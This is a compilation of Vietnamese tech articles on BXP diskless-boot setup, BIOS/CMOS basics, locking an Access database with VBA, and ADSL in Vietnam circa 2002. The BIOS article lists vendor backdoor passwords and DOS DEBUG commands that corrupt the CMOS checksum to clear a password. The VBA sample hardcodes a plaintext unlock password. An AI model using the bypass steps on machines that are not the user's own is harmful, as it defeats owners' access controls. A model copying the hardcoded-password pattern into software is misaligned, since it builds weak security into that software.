7. Tiếp theo bạn làm tương tự như vậy cho USER02, USER03...
*Chú ý: Cả 2 cách tạo Client này cách nào cũng tốt cả, tuy nhiên chọn cách 1 nhanh hơn và cũng không xảy trường hợp nhập sai địa chỉ MAC.
3-6 Đăng ký ổ cứng ảo đã được tạo trước cho Client
1. Từ màn hình BXP Administrator chọn menu View, tiếp theo click chọn vào Server->Client->Disk.
2. Click chuột phải vào một client, chẳng hạn là USER01 và chọn Properties.
3. Click vào tab Disks như hình dưới
4. Ở mục Boot order, chọn Hard Disk First
5. Click vào nút Change, hộp thoại sau sẽ xuất hiện
6. Từ mục , Click vào biểu tượng của IO Server, nó sẽ hiện ra danh sách các ổ cứng ảo đã được tạo từ trước, chẳng hạn là VIRTUALXP.
7. Click vào biểu tượng Image là VIRTUALXP và click vào nút Add
8. Click OK 2 lần để hoàn tất
Như vậy là bạn đã đăng ký ổ cứng ảo VIRTUALXP cho USER01, sau này bạn tạo nhiều user và nhiều ổ cứng ảo thì phải thực hiện lần lượt các thao tác trên để đăng ký một ổ cứng ảo nào đó cho một client nào đó. (Đây xem như chúng ta đang cài theo phương pháp Private Image).
III.CÀI ĐẶT Ở MÁY CLIENT:
1. Từ một máy bất kỳ, chẳng hạn là USER01, gắn ổ cứng tham khảo đã cài sẵn WinXP Professional. Về phần giao thức mạng ta không khai báo gì ở phần TCP/IP cả. Ở phần Computer name (Click chuột phải vào My Computer chọn Properties, tiếp theo chọn tab Computer Name và click nút Change để khai báo
- Ở mục Computer name gõ vào USER01
- Ở mục Member of ta có thể khai báo là thuộc Domain hay Workgroup đều được, tuy nhiên nên chọn là Workgroup để quá trình đăng nhập vào mạng nhanh hơn. Ở ô Workgroup ta khai báo vào tên Domain của máy chủ.
- Tiếp theo tạo cho WinXP của máy client một user chẳng hạn là USER01 với quyền Admin
- Sau đó khởi động lại máy và log vào với USER01, phải bảo đảm là máy client này đã thông mạng với máy chủ, nếu không phải kiểm tra lại các bước trên.
2. Click vào file BXP25.exe để tiến hành phần cài đặt cho client
Hộp thoại sau sẽ xuất hiện
3. Click vào mục thứ 3 là Client rồi click Next
4. Ở các màn hình kế tiếp bạn chỉ việc click Next
5. Tiếp theo sẽ xuất hiện màn hình Found New Hardware Wizard như sau
Bạn chỉ việc click Next hoặc là Continue anyway, sau đó quá trình cài đặt kết thúc và yêu cầu bạn khởi động lại máy.
6. Tiếp theo bạn khởi động lại máy và khai báo là bootrom sẽ ưu tiên khởi động trước. Do ở phần BXP Administrator (ở máy chủ) trong cấu hình ổ cứng ảo của client ta đã khai báo là Hard Disk first (xem lại phần 3-6) vì vậy máy client sau khi khởi động bằng bootrom kết nối với server của BXP sẽ chuyển tiếp qua khởi động hệ điều hành WinXP từ ổ cứng tham khảo của nó.
Nếu các bước trên đều tốt đẹp thì khi vào My Computer bạn sẽ thấy xuất hiện thêm một ổ đ*a nữa như sau: (ổ E
Tiếp theo là quá trình copy toàn bộ partition khởi động WinXP (mặc nhiên là ổ C) qua ổ cứng ảo trên máy chủ (ổ E
7. Từ Start\All Programs\Venturcom BXP, chọn Image Builder
8. Ở mục Destination Path bạn gõ vào ký tự ổ đ*a mới xuất hiện thêm trong My Computer ( trong VD này là E
9. Click Build để tiến hành copy, nếu thấy báo lỗi thì bạn tắt dấu check ở mục Delete all files and....
Quá trình copy sẽ diễn ra trong vài chục phút
Sau khi qúa trình copy kết thúc, ở máy Client bạn tháo ổ cứng ra và cho boot bằng Bootrom. Còn ở máy chủ bạn vào BXP Administrator, từ menu View chọn Client->Disk, click chuột phải trên USER01 và chọn Properties, tiếp theo click vào tab Disks, ở mục Boot order bạn chọn lại là Virtual Disk First (xem lại phần 3-6)
- Xem như đến đây bạn đã hoàn thành cho client USER01, nó có thể khởi động bootrom với Windows XP một cách nhẹ nhàng như là khi chạy từ ổ cứng tham khảo.
PHẦN3
CÀI ĐẶT CACHE
Mặc dù ở các bước trên chúng ta đã cài đặt hoàn chỉnh một máy boot được từ bootrom và có thể tiếp tục như vậy để hoàn tất cho một dàn máy mạng không ổ cứng chạy WinXP. Tuy nhiên BXP2.5 đã đưa ra một công nghệ mới mà các version trước chưa có, đó là cơ chế cache cho máy con.
Bạn nào đã từng cài mạng bootrom với 3Com VLD hoặc Bootnic sẽ thấy có 2 nhược điểm sau:
1. Do chỉ có duy nhất một cách cài là dùng riêng mỗi ổ cứng cho máy con (Private Image) nên dẫn đến băng thông tải trên mạng sẽ rất lớn, quá trình khởi động cũng như chạy các ứng dụng của client rất chậm.
2. Mỗi client xem như có một ổ cứng riêng hoàn toàn nên người sử dụng có thể xoá file, thay đổi cấu hình... dẫn đến hay bị trục trặc về phần mềm, hư Windows...
BXP2.5 đã khắc phục được 2 nhược điểm đó bằng cách đưa ra các phương pháp cache rất thông minh.
1. Các phương pháp cache của BXP 2.5:
1. Private Image với cơ chế Ram cache
Mỗi client có một ổ cứng ảo riêng theo phương pháp Private image, tuy nhiên trong quá trình hoạt động ở client, mọi thao tác ghi lên ổ cứng như tạo, xoá file, thay đổi cấu hình... sẽ ghi tạm lên Ram của máy Client. Sau khi máy client khởi động lại hệ thống sẽ trở về trạng thái cũ. Nó sẽ cho tạo cho các máy client mỗi lần khởi động lại đều trở về trạng thái cũ, "mới như lúc đầu"
*Ưu điểm: - Mỗi client có thể trả lại cấu hình cũ dễ dàng bằng cách khởi động lại máy
* Nhược điểm:
- Mọi sự thay đổi trên ổ cứng ảo đều không có tác dụng
- Ram của hệ thống sẽ bị giảm để làm cache
2. Private image với cơ chế Server cache:
Phương pháp này cũng giống như trên, chỉ thay đổi là thay vì cache trên ram thì sẽ chuyển qua cache ở một phần ổ cứng trên máy chủ như hình minh hoạ.
Phương pháp này so với Ram cache có một ưu điểm là không làm giảm Ram hệ thống của các client.
3. Phương pháp dùng chung ổ cứng ảo (Shared Image) với Ram cache
Hình minh hoạ như sau:
Trong phương pháp này, tất cả các client đều dùng chung một ổ cứng ảo, bởi vậy bắt buột phải dụng chế độ cache, ở đây là cache bằng Ram của client
*Ưu điểm - Băng thông tải trên mạng sẽ giảm -> qúa trình khởi động cũng như chạy ứng dụng của các client sẽ nhanh hơn.
*Nhược điểm: - Một phần Ram của máy client phải dùng để làm cache
4. Phương pháp dùng chung ổ cứng ảo (Shared mage) với Server cache
Tương tự như trên nhưng chuyển cache từ Ram của client sang ổ cứng của máy chủ
2. Cách cài đặt Cache
2-1 Cài đặt cache với phương pháp Private Image
Sau khi các client có thể khởi động WinXP với phương pháp Private Image, để tối ưu hốa hoạt động của các máy client ta phải cấu hình Cache cho nó theo các phương pháp cache đã nêu trên.
1. Từ Start\Program\Venturcom BXP, click vào BXP Config, hộp thoại sau sẽ xuất hiện.
2. Click nút chỉ đến ổ cứng ảo cần cấu hình, VD muốn cấu hình cache cho USER01 chọn D:\VDISKS\VIRTUALXP
Chú ý: Phải bảo đảm là client USER01 hiện tại đang tắt máy ta mới cấu hình cho ổ cứng ảo VIRTUALXP được. Khi muốn cấu hình cache cho ổ cứng ảo nào thì client tương ứng phải tắt máy.
3. Click chọn vào Enable write cache, tiếp theo click chọn vào Cache on server disk hoặc Cache in client RAM (chọn dung lượng RAM ở ô bến trái để dùng làm cache) để cấu hình là cache trên server hoặc cache trên Ram.
4. Click OK để hoàn tất
(Với các client còn lại ta cũng làm tương ứng)
Sau khi đã chọn cache trên server như trên, trong quá trình hoạt động, ở máy chủ trong thư mục D:\VDISKS\WriteCache sẽ xuất hiện các file tạm với dung lượng vài MB đến vài chục MB.
Chú ý. Việc cấu hình cache này sẽ được ghi lại vào chính ổ cứng ảo mà bạn đã chọn chứ không liên quan gì đến client cũng như máy chủ cả.. Client nào được đăng ký với ổ cứng này sẽ có chức năng cache như vậy. Bạn muốn tắt đi chức năng cache thì phải chọn lại đúng ổ cứng ảo đó và tắt đi dấu check ở mục Enable write cache
Do chức năng cache rất tuyệt vời, vì vậy khi client đã boot được từ Rom bạn phải chắc chắn các ứng dụng đã chạy ổn định và đầy đủ thì mới tiến hành khai báo chức năng cache chứ không thôi khi đã cache rồi thì mỗi lần máy client hoạt động , mọi sự cài đặt thêm ứng dụng hoặc cấu hình lại đều không có tác dụng sau khi khởi động lại máy.
2-2 Cài đặt Share Image - Multicash và cache
Với phương pháp Share Image, các client trong mạng (USER01, USER02, USER03...) đều được đăng ký với chỉ một ổ cứng ảo. Trong trường hợp này chúng ta chọn VIRTUALXP làm ổ cứng share, vì vậy chúng ta phải tiến hành việc đăng ký ổ đ*a ảo này cho tất cả các client trong mạng trước khi khai báo Multicash như bước tiếp theo.
1. Từ hộp thoại trên click chọn vào Enable Multicash boot.
2. Ở mục Multicash address giữ nguyên địa chỉ IP hiện sẵn là 233.x.x.x
3. Click OK để hoàn tất
Sau đó khởi động client đầu tiên được khai báo sử dụng ổ cứng ảo VILTUALXP. Quá trình khởi động lần đầu này có thể lâu hơn bình thường.
Khi đã chọn Multicache, trong thư mục D:\VDISKS sẽ xuất hiện thêm một file *.abs, chẳng hạn trong trường hợp này là USER01.ABS. Đây là file chứa thông tin tất cả các client để khởi động các client trong quá trình đầu.
Chú ý: Với phương pháp Private image chúng ta có thể chọn dùng cache hoặc không nhưng với phương pháp Share image - Multicash này bắt buộc phải dùng cache.
*Nếu bạn khai báo ở máy client log on vào máy chủ với kiểu khai báo Domain chứ không phải Workgroup, bạn phải khai báo thêm ở máy chủ và client như sau:
-Ở máy chủ, bạn chọn Command Prompt, sau đó di chuyển đến thư mục C Program Files\Venturcom\BXP và gọi lệnh sau:
BNSETCA USER01
BNSETCA USER02
BNSETCA USER03
.... Bạn thực hiện với hết tất cả các user trong hệ thống mạng.
Ở client bạn làm như sau:
Vào Control Panel, click vào Administrative Tools ->Local Security Policy. Từ cửa sổ hiện ra double click vào mục Local Policies, tiếp theo double click vào Security Options.
Tiếp theo từ cửa sổ bên phải double click vào mục Disable machine account password change, click chọn vào mục Enable và OK để thoát.
Chú ý: ở máy client chỉ làm thao tác này khi chưa khai báo cache!.
Tác giả: (someone)
|
|
|
|
Tác giả: (someone)
Hệ vào ra cơ sở ( BIOS - Basic Input / output System ) là gì ?
Nó là một tập hợp chương trình sơ cấp để hướng dẫn các hoạt động cơ bản của máy tính, bao gồm cả thủ tục khởi động và việc quản lý các tín hiệu nhập vào từ bàn phím. BIOS được nạp cố định trong một chip nhớ chỉ đọc ( ROM - ReadOnly memory) đươc để trên bo mạch chủ ( MainBoard ).
Khi ta bắt đầu bật máy ( khởi động nguội - Cold boot ), hoặc khởi động lại ( khởi động nóng - Warm boot ) bằng nút reset hay bằng tổ hợp phím Ctrl + Alt + Del, các chương trình sơ cấp này sẽ được đưa vào máy tính để thực hiện quá trình tự kiểm tra khi khởi động ( POST - Power On Self Test ) và kiểm tra bộ nhớ ( memory check ). Nếu phát hiện ra có bất kỳ trục trặc nào của các bộ phận trong máy tính hay bàn phím, ổ đĩa ... một thông báo lỗi sẽ xuất hiện trên màn hình. Nếu mọi việc khởi tạo hoàn thành tốt đẹp, chương trình trong ROM sẽ tiến hành đọc Boot sector hay Master Boot record ( tùy theo bạn đặt chế độ khởi động đầu tiên từ ổ A hay ổ C trong CMOS ) vào trong RAM tại địa chỉ 0:07COOh.
CMOS là gì ?
Một chức năng khác của BIOS là cung cấp chương trình cài đặt ( Setup Program ), đó là một chương trình dựa vào trình đơn để bạn tự chọn các thông số cấu hình hệ thống cơ bản như ngày giờ hệ thống, câu hình ổ đĩa, kích cỡ bộ nhớ, thông số Cache ... và trình tự khởi động kể cả mật khẩu. Ngày nay các BIOS còn cho phép lựa chọn các thông số cài đặt cho các cổng, các giao diện đĩa cứng, các thiết lập ngắt PCI ... và nhiều thông số khác.
Các thông số tự chọn mang tính sống còn này sẽ được giữ lại trong chip CMOS thuộc BIOS- các thông tin này không bị mất khi tắt máy vì được nuôi bằng pin. Trên các PC hiện nay, BIOS thường chỉ sử dụng 128 Byte đầu của CMOS để lưu trữ dữ liệu, còn 128 Byte còn lại chỉ là bản lưu dự phòng của dữ liệu trên. Khi khởi động lại, BIOS luôn so sánh giá trị của 2 khối dữ liệu đó và nếu phát hiện được sự khác nhau nó sẽ yêu cầu bạn chạy chương trình Setup để chỉnh lại các thông số đó.
Thông thường mỗi máy có hai chế độ thiết lập Password là ALLWAY hay SYSTEM ( tùy theo BIOS ) và chế độ SETUP.
Đối với chế độ ALLWAY hay SYSTEM mối khi bạn bật máy lên nó sẽ đòi hỏi bạn nhập password đúng thì mới cho khởi động tiếp.
Còn với chế độ SETUP bạn vẫn khởi động và sử dụng được máy nhưng khi bạn cần truy nhập vào chương trình SETUP nó mới đòi bạn nhập vào pass.
Password được thiết lập ở chế độ ALLWAY hay SYSTEM
Cách 1 : Đối với cách thiết lập pass này thường thì phải sử dụng một số Pass mặc định của nhà sản xuất - thường gọi là backdoor password-
1- Đối với Award BIOS sử dụng một trong các pass sau :
AWARD_SW
j262
HLT
SER
SKY_FOX
BIOSTAR
ALFAROME
Lkwpeter
j256
AWARD?SW
LKWPETER
syxz
ALLy
589589
589721
awkward
CONCAT
d8on
CONDO
j64
szyx
2- Đối với AMI BIOS sử dụng một trong các pass sau :
AMI
BIOS
PASSWORD
HEWITT RAND
AMI?SW
AMI_SW
LKWPETER
A.M.I.
CONDO
589589
3- PHOENIX BIOS
phoenix
4 - Amptron
Polrty
5- AST
SnuFG5
6- Biostar
Biostar
Q54arwms
7- Compaq
Compaq
8- Concord
last
9- CTX International
CTX_123
10- CyberMax
Congress
11- Daewoo
Daewuu
12- Daytek
Daytec
13- Dell
Dell
14- Digital Equipment
komprie
15- HP Vectra
hewlpack
16- IBM
IBM
MBIUO
sertafu
17- Iwill
iwill
18- JetWay
spoom1
19- Joss Technology
57gbz6
20- Toshiba
24Banc81
Toshiba
toshy99
21-Vextrec Technology
Vextrex
22-Vobis
merlin
23- WIMBIOSnbsp BIOS v2.10
Compleri
24-Zenith
3098z
Zenith
25- ZEOS
zeosx
technolgi
26- M Technology
mMmM
27- Micronics
dn_04rjc
28-Nimble
xdfk9874t3
29- Packard Bell
bell9
30- QDI
QDI
Ngoài ra hầu hết các máy tính IBM Aptiva đều có thể xóa pass bằng cách giữ chặt 2 phím chuột tại lúc bật máy cho đến khi quá trình khởi động xong.
Note : Nhưng riêng đối với các máy tính xách tay - để tránh tình trạng ăn trộm máy tính các nhà sản xuất đã không có bất kỳ Backdoor password . BIOS passwords trong hầu hết các máy xách tay được lưu trong một con chip đặc biệt đặt trên Mainboard và chỉ có một cách để bypass là thay thế con chip này. BIOS passwords của nó không thể bypassed hoặc reset bằng việc tháo pin CMOS. Nhưng nếu Hard disk cũng bị thiết lập password thì cho dù có thay đổi chip cũng không thể truy nhập vào Hard disk.
Cách 2 : mở nắp máy để xóa CMOS. bạn phải tìm ra jumper quy định chức năng xóa CMOS và đặt vào đúng vị trí ( Công việc này đòi hỏi bạn phải có tài liệu của MainBoard )
Password được thiết lập ở chế độ SETUP
Đối với cách này chỉ khi nào bạn cần truy nhập vào BIOS nó mới đòi hỏi Pass do đó bạn có thể dùng lệnh hay viết một chương trình cho chạy trên máy đó là có thể phá được pass của BIOS trên máy đó.
Trong BIOS thì 64 ô nhớ đầu tiên là quan trọng nhất, trong đó có 30 ô được bảo vệ kỹ hơn nhờ phép "tổng kiểm tra " ( check sum). Đó là các ô từ địa chỉ 16 đến 45 ( 10h đến 2Dh ). Tổng kiểm tra được lưu trữ trong 2 ô nhớ 46 và 47 ( 2eh và 2fh ). Nếu tổng kiểm tra bị sai thì BIOS sẽ không chấp nhận nội dung ghi cấu hình máy và tự động gọi chương trình SETUP trong BIOS để yêu cầu thiết lập lại cấu hình => ta chỉ cần làm hỏng thông tin trong hai ô nhớ đó
Các chương trình làm hỏng hai ô nhớ đó đã được viết bằng các ngôn ngữ như C hay Pascal ... ở đây tôi giới thiệu cho các bạn cách sử dụng ngay lệnh DEBUG của DOS để phá hỏng thông tin đó
bạn khởi động về chế độ DOS thật , sau đó ở dấu nhắc của DOS gõ vào các lệnh sau :
DEBUG ( Enter)
- o 70 2F ( Enter )
- o 71 FF ( Enter )
- q
Tài liệu tham khảo
1- http://www.password-crackers.com/crack1.html#PDF
2- http://www.pwcrack.com/bios.shtml
3- http://www.cgsecurity.org/index.html?cmospwd.html
Tác giả: (someone)
|
|
|
|
Tác giả: (someone)
1. Bảo vệ mã lệnh VBA (Visual Basic for Application) bằng cách chọn mục Properties trên trình đơn Tools của cửa sổ soạn thảo Microsoft Visual Basic rồi chọn trang Protection trên hộp thoại Project Properties. Cuối cùng, chọn Lock project for viewing, kèm theo là mật khẩu bảo vệ. Với cách này, cấu trúc và dữ liệu các bảng (table) vẫn có thể được xem và sửa đổi.
2. Dùng chức năng Make MDE file để ngăn không cho sửa đổi mã lệnh, thiết kế biểu mẫu (form) và thiết kế báo biểu (report). Với cách này, cấu trúc và dữ liệu các bảng (table) vẫn có thể được lấy đi để chuyển vào tập tin .MDB khác mà xem và sửa đổi.
3. Dùng chức năng Encrypt / Decrypt database… để mã hóa CSDL, ngăn không cho các chương trình tiện ích hay xử lý văn bản giải mã nhưng vẫn có thể dùng Access để mở.
4. Dùng chức năng Set database password để quy định mật khẩu cho CSDL. Cách này hơi phiền nếu có một bảng trong CSDL khác liên kết (link) với nó. Nếu quên mật khẩu thì … khóc luôn chứ sao!
5. Thiết kế một biểu mẫu khởi động, trong đó yêu cầu cho biết tên và mật khẩu, dùng hộp thoại Startup (từ danh sách Display Form/Page) để quy định phải mở biểu mẫu này trước tiên mỗi lần mở CSDL. Nhờ cách này, ta có thể giấu luôn cửa sổ Database, nơi có thể xem và chọn các thành phần của CSDL để sửa chữa.
Trong những cách trên, cách thứ 5 vẫn có thể bị vượt qua bằng cách nhấn và giữ phím Shift trong lúc mở CSDL. Để khắc phục, ta có thể dùng Visual Basic gán trị False cho thuộc tính AllowBypassKey để vô hiệu hóa phím Shift khi mở CSDL.
Giả sử bạn có một CSDL tên dbLock.MDB. Mỗi lần người ta mở nó, bạn muốn biểu mẫu frmKhoiDong luôn được hiển thị trước tiên bằng cách xác định Display Form/Page là frmKhoiDong. Để thay đổi thuộc tính AllowBypassKey, bắt buộc phải mở CSDL, gán trị mới cho thuộc tính này, đóng CSDL lại thì lần mở sau mới có ép-phê. Bạn nhớ, cần khóa làm sao để người ta không mở được mà mình mở được, nghĩa là ta phải có chìa khóa để mở. Chìa ở đây chính là một biểu mẫu khác, chẳng hạn có tên là frmChiaKhoa.
Khi đã thay đổi thuộc tính AllowBypassKey được rồi, chắc chắn biểu mẫu frmKhoiDong được hiển thị khi mở CSDL. Cho nên ta đặt chìa khóa thông qua biểu mẫu này bằng cách vẽ một ô điều khiển nào đấy (miễn sao nó có thủ tục xử lý tình huống Click là được), chẳng hạn nhãn lblChiaKhoa, rồi đặt thuộc tính Visible là No và thêm dòng lệnh DoCmd.OpenForm “frmChiaKhoa” vào thủ tục xử lý tình huống Click. Bạn phải nhớ vị trí nhãn lblChiaKhoa để lôi chìa khóa ra nhé. Như vậy, vấn đề còn lại nằm ở biểu mẫu frmChiaKhoa.
Bạn mở cửa sổ soạn thảo Microsoft Visual Basic, chọn mục References… để bảo đảm Microsoft DAO xx.xx Object Library (trong đó, phiên bản xx.xx có thể là: 2.5 hoặc 3.51 hoặc 3.6 tùy theo phiên bản Access, dĩ nhiên nên chọn phiên bản mới nhất) đã được chọn trong danh sách Available References.
Hình 1: Biểu mẫu cần thiết kế
Hình 1 là biểu mẫu frmChiaKhoa cần thiết kế, bao gồm một ô văn bản txtPassword để nhận mật khẩu mà người cần mở khóa phải gõ vào, một nút lệnh cmdLock thực hiện việc khóa CSDL và một nút lệnh cmdUnlock thực hiện việc mở khóa CSDL. Xong, bạn gõ các thủ tục xử lý như đoạn mã 1. Trước khi quậy chuyện này trên một CSDL, bạn nên sao chép phòng hờ CSDL để tránh sự cố khóa được rồi nhưng không mở được (do bạn gõ nhầm các dòng lệnh).
Đoạn mã 1
'Hàm ChangeProperty thay đổi các thuộc tính của CSDL
Function ChangeProperty(strPropName, varPropType, varPropValue)
Dim dbs As Database, prp As Property
Const conPropNotFoundError = 3270
Set dbs = CurrentDb
On Error GoTo Change_XuLyLoi
dbs.Properties(strPropName) = varPropValue
ChangeProperty = True
Change_KetThuc:
Exit Function
Change_XuLyLoi:
'Thuộc tính không thấy
If Err = conPropNotFoundError Then
Set prp = dbs.CreateProperty(strPropName, _
varPropType, varPropValue)
dbs.Properties.Append prp
Resume Next
Else
'Không biết lỗi gì
ChangeProperty = False
Resume Change_KetThuc
End If
End Function
'Xử lý tình huống chọn nút [Khóa database]
Private Sub cmdLock_Click()
‘Biểu mẫu này được nạp trước
ChangeProperty "StartupForm", dbText, "frmKhoiDong"
ChangeProperty "StartupShowDBWindow", dbBoolean, False
ChangeProperty "StartupShowStatusBar", dbBoolean, False
ChangeProperty "AllowBuiltinToolbars", dbBoolean, False
ChangeProperty "AllowFullMenus", dbBoolean, False
ChangeProperty "AllowBreakIntoCode", dbBoolean, False
ChangeProperty "AllowSpecialKeys", dbBoolean, False
‘Không cho xài phím Shift để bỏ qua biểu mẫu frmKhoiDong
ChangeProperty "AllowBypassKey", dbBoolean, False
MsgBox "Cơ sở dữ liệu đã được khóa! Đóng cơ sở dữ liệu, ê.", vbOKOnly, " Security"
cmdExit.SetFocus
cmdUnlock.Visible = True
cmdLock.Visible = False
End Sub
'Xử lý tình huống chọn nút [Mở database]
Private Sub cmdUnlock_Click()
‘Không cần biểu mẫu khởi động nữa
ChangeProperty "StartupForm", dbText, ""
ChangeProperty "StartupShowDBWindow", dbBoolean, True
ChangeProperty "StartupShowStatusBar", dbBoolean, True
ChangeProperty "AllowBuiltinToolbars", dbBoolean, True
ChangeProperty "AllowFullMenus", dbBoolean, True
ChangeProperty "AllowBreakIntoCode", dbBoolean, True
ChangeProperty "AllowSpecialKeys", dbBoolean, True
ChangeProperty "AllowBypassKey", dbBoolean, True
MsgBox "Cơ sở dữ liệu đã được mở khóa ! _
Đóng cơ sở dữ liệu,.", _
vbOKOnly, " Security"
cmdExit.SetFocus
txtPassword = ""
cmdLock.Visible = True
cmdUnlock.Visible = False
txtPassword.Visible = False
End Sub
'Xử lý tình huống khi mở biểu mẫu
Private Sub Form_Open(Cancel As Integer)
Dim dbs As Database
Set dbs = CurrentDb
On Error GoTo KhongCoThuocTinh_Err
If dbs.Properties("AllowBypassKey") Then
cmdLock.Visible = True
txtPassword.Visible = False
Else
cmdLock.Visible = False
txtPassword.Visible = True
End If
Exit Sub
KhongCoThuocTinh_Err:
cmdLock.Visible = True
txtPassword.Visible = False
End Sub
'Khi người ta gõ mật khẩu và nhấn phím Enter
Private Sub txtPassword_LostFocus()
If txtPassword = "echip" Then
cmdUnlock.Visible = True
End If
End Sub
Tác giả: (someone)
|
|
|
|
Tác giả: (someone)
Thời gian gần đây, chắc các bạn cũng đã nghe nói tới việc triển khai dịch vụ Internet tốc độ cao ADSL tại Việtnam? Vậy thì bao giờ, ở đâu, thế nào... và tóm lại thì ADSL nó là cái gì? Sự kiện này đã thu hút mạnh sự quan tâm của chúng tôi, và chúng tôi muốn chia sẻ những thông tin chúng tôi biết được về vấn đề này với các bạn. Chúng tôi sẽ cập nhật ngay khi có tin mới, nên các bạn hãy kiểm tra lại liên tục để biết được thông tin mới nhất.
Giới thiệu
ADSL là một cách kết nối tốc độ cao tới Internet, với tốc độ có thể nhanh hơn vài chục đến cả trăm lần modem quay số hiện nay chúng ta đang dùng. Ðây sẽ là một sự hứa hẹn thực sự cho chúng ta để có thể "lướt" trên Internet chứ không phải là "bò" như hiện tại.
Theo các tin tức gần đây do các phương tiện thông tin đại chúng đưa, chúng ta có thể biết rằng dịch vụ ADSL được cung cấp bởi sự hợp tác giữa nhà cung cấp khả năng truy cập Internet lớn nhất Việtnam hiện nay là VDC và nhà cung cấp dịch vụ ADSL lớn nhất Hàn Quốc hiện nay là Korea Telecom.
Hiện nay, tại các nước có cơ sở hạ tầng Internet tiên tiến, ADSL đã trở thành một phương tiện kết nối phổ biến vào mạng toàn cầu nhưng đối với hầu hết người dùng Internet trong nước, ADSL còn là một khái niệm xa lạ. Bài viết sau đây sẽ giới thiệu với các bạn những nét sơ lược về công nghệ kết nối Internet này.
Chi tiết về công nghệ này, chúng tôi sẽ đề cập đến phần sau của bài viết. Phần đầu chúng tôi sẽ cung cấp một số thông tin nóng về sự kiện này.
Chú ý: Một số thông tin dưới đây chúng tôi nhận được từ những nguồn không chính thức, tuy nhiên có thể tin tưởng. Mặc dù vậy, trong tương lai có thể sẽ có những thay đổi mà chúng tôi không thể biết trước, do đó bạn hãy tạm coi những thông tin dưới đây chỉ là thông tin để tham khảo.
Lịch trình của ADSL tại Việtnam
• Sau khi thử nghiệm tại thành phố Hải Phòng vào đầu tháng 04-2002 với đường truyền 8M/2M. Theo tạp chí Thế giới Vi tính số tháng 04-2002, tốc độ download đạt được là ~5M và upload là ~400k. (Chúng tôi sẽ giải thích chi tiết sau).
• Ðầu tháng 05-2002, theo tờ tin Khám phá Internet phát hành bởi VNN. Dịch vụ sẽ tiếp tục được triển khai thử nghiệm tại Hànội và thành phố Hồ Chí Minh (HCMC). Sau đó đưa vào sử dụng rộng rãi vào đầu tháng 07-2002. Tuy nhiên cho tới giờ thì dường như kế hoạch này bị đình lại một thời gian, do chúng tôi chưa nhận được tin gì về việc thử nghiệm này, cũng chưa nhận thấy việc quảng cáo rộng rãi của VNN về dịch vụ này.
• Theo một nguồn tin có thể tin tưởng được, đầu tháng 07-2002, việc thử nghiệm ADSL sẽ được tiến hành với một số người dùng hạn chế tại thành phố Hànội. Số người dùng hạn chế này sẽ là những thuê bao điện thoại có biết đến việc thử nghiệm này và khoảng cách cáp điện thoại từ tổng đài điện thoại tới địa điểm thuê bao dưới 1km.
• Cho đến cuối quý ba năm nay, có thể là cuối tháng 09-2002 hoặc đầu tháng 10-2002. Việc chính thức cung cấp rộng rãi dịch vụ ADSL tại thành phố Hànội và HCMC sẽ thành hiện thực.
Một số chi tiết về ADSL tại Việtnam
• Tốc độ thử nghiệm tại Hải Phòng là 8M/2M, do đó hy vọng tốc độ thử nghiệm tại Hànội và HCMC sẽ tương đương mức đó.
• Giá cước dự tính sẽ cố định ở khoảng 30USD một tháng, tuy nhiên dung lượng truy cập bị hạn chế ở một mức nào đó.
• Cũng có tin rằng cước sẽ được tính theo dung lượng truy cập, càng dùng nhiều thì càng trả nhiều tiền.
• Do chính sách phát triển Internet của nhà nước và được tổng cục bưu chính viễn thông trợ giá, nên giá cước thấp đến mức đáng ngạc nhiên như ở trên là hoàn toàn có thể tin được. Khoái thật... ^_^
• Kết nối 24/7 là có thực, do đó bạn không phải lo đến chuyện ngắt mạng mỗi khi xong việc. Bạn có thể online cả ngày.
Những thông tin phụ xung quanh việc này
• Giá cước Internet sắp tới sẽ giảm một nửa so với hiện tại. Và cái sắp tới đó dự tính là tháng 07-2002.
• Trong tương lai (khoảng năm 2003), sẽ tiến tới miễn phí hoàn toàn Internet qua modem quay số như hiện nay.
• Giá cước điện thoại cũng giảm 30% trong thời gian tới. Chúng tôi cho rằng việc giảm giá liên tục như vậy là phù hợp với xu hướng chung khi mà thực tế giá viễn thông của chúng ta cao thuộc hàng đứng đầu thế giới!
• Bên cạnh đó, sau khi tổng thống Hàn Quốc sang thăm Việtnam, kế hoạch triển khai mạng điện thoại di động dựa trên công nghệ CDMA đã được thông qua, và dự tính cuối năm nay sẽ phủ sóng khu vực HCMC.
• Các công nghệ khác trong thông tin liên lạc như kết nối ISDN, tăng băng thông kết nối, chuyển đổi công nghệ điện thoại di động... sẽ liên tục được áp dụng.
Nói tóm lại, trong xu hướng toàn cầu hóa hiện nay, Việtnam không thể đứng ngoài cuộc. Và vẫn tiếp tục giữ tốc độ phát triển về viễn thông nhanh thuộc loại hàng đầu thế giới, chúng ta hoàn toàn có thể tin tưởng vào việc thông tin liên lạc của Việtnam sẽ bắt kịp tầm thế giới.
Căn bản về công nghệ ADSL
ADSL là một thành viên của họ công nghệ kết nối modem tốc độ cao hay còn gọi là DSL, viết tắt của Digital Subscriber Line.
DSL tận dụng hệ thống cáp điện thoại bằng đồng có sẵn để truyền tải dữ liệu ở tốc độ cao, tiết kiệm kinh phí lắp đặt cáp quang (fibre-optic) đắt tiền hơn. Tất cả các dạng DSL hoạt động dựa trên thực tế là truyền âm thanh qua đường cáp điện thoại đồng chỉ chiếm một phần băng thông rất nhỏ. DSL tách băng thông trên đường cáp điện thoại thành hai: một phần nhỏ dành cho truyền âm, phần lớn dành cho truyền tải dữ liệu ở tốc độ cao.
Trên đường dây điện thoại thì thực tế chỉ dùng một khoảng tần số rất nhỏ từ 0KHz đến 20KHz để truyền dữ liệu âm thanh (điện thoại). Công nghệ DSL tận dụng đặc điểm này để truyền dữ liệu trên cùng đường dây, nhưng ở tần số 25.875 KHz đến 1.104 MHz
Loại DSL Tên đầy đủ Download Upload Khoảng cách * Số đường điện thoại cần Hỗ trợ điện thoại **
ADSL Asymetric DSL 8Mbps 800Kbps 5500m 1 Có
HDSL High bit-rate DSL 1.54Mbps 1.54Mbps 3650m 2 Không
IDSL Intergrated Service Digital Network DSL 144Kbps 144Kbps 10700m 1 Không
MSDSL Multirate Symetric DSL 2Mbps 2Mbps 8800m 1 Không
RADSL Rate Adaptive DSL 7Mbps 1Mbps 5500m 1 Có
SDSL Symetric DSL 2.3Mbps 2.3Mbps 6700m 1 Không
VDSL Veryhigh bit-rate DSL 52Mbps 16Mbps 1200m 1 Có
* Khoảng cách cáp từ thuê bao đến tổng đài, nếu nằm trong khoảng cách này thì có thể kết nối xDSL
** Khả năng dùng điện thoại bình thường khi xDSL đang hoạt động trên đường cáp
